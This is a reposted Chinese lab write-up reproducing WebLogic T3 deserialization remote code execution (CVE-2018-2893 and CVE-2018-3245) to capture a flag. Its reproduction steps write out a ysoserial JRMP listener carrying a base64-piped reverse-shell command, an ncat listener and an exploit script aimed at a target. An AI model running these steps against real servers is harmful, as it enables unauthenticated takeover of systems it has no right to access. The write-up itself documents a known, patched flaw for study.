0


Weblogic 反序列化漏洞 (CVE-2018-2893 & CVE-2018-3245)

Weblogic 反序列化漏洞 (CVE-2018-2893 & CVE-2018-3245)

文章目录


一、漏洞描述

WebLogic Server使用T3协议在WebLogic Server和客户端间传输数据和通信,由于WebLogic的T3协议和Web协议使用相同的端口,导致在默认情况下,WebLogic Server T3协议通信和Web端具有相同的访问权限。 易受攻击的WebLogic服务允许未经身份验证的攻击者通过T3网络访问及破坏Oracle WebLogic Server。此漏洞的成功攻击可能导致攻击者接管Oracle WebLogic Server,造成远程代码执行。

两个漏洞的利用方式和工具都相同,所以合并为一份WriteUp

二、影响范围

CVE-2018-2893漏洞影响范围:
WebLogic 10.3.6.0
WebLogic 12.1.3.0
WebLogic 12.2.1.2
WebLogic 12.2.1.3

CVE-2018-3245漏洞影响范围:
WebLogic 10.3.6.0
WebLogic 12.1.3.0
WebLogic 12.2.1.3

三、复现过程

利用工具:https://github.com/pyn3rd/CVE-2018-2893
1.开启VPS的恶意rpc服务

java -cp ysoserial-cve-2018-2893.jar ysoserial.exploit.JRMPListener 1099 Jdk7u21 "bash -c {echo,反弹shell命令}|{base64,-d}|{bash,-i}"

在这里插入图片描述

2.开启VPS的NC监听

ncat -nvlp 65001

在这里插入图片描述
3.生成对应的恶意文件payload

java -jar ysoserial-cve-2018-2893.jar JRMPClient4 "RMI_SERVICE_IP:Port"> poc.ser

4.执行恶意文件payload

python weblogic.py [target_host][port] poc.ser

在这里插入图片描述

5.获得反弹shell
在这里插入图片描述

6.执行

ls /tmp

得到flag

在这里插入图片描述

四、修复建议

Oracle官方已经在关键补丁更新中修复了此漏洞,受影响的用户请尽快升级更新进行防护。


本文转载自: https://blog.csdn.net/weixin_42575797/article/details/125542504
版权归原作者 Gh0stX 所有, 如有侵权,请联系我们删除。

“Weblogic 反序列化漏洞 (CVE-2018-2893 & CVE-2018-3245)”的评论:

还没有评论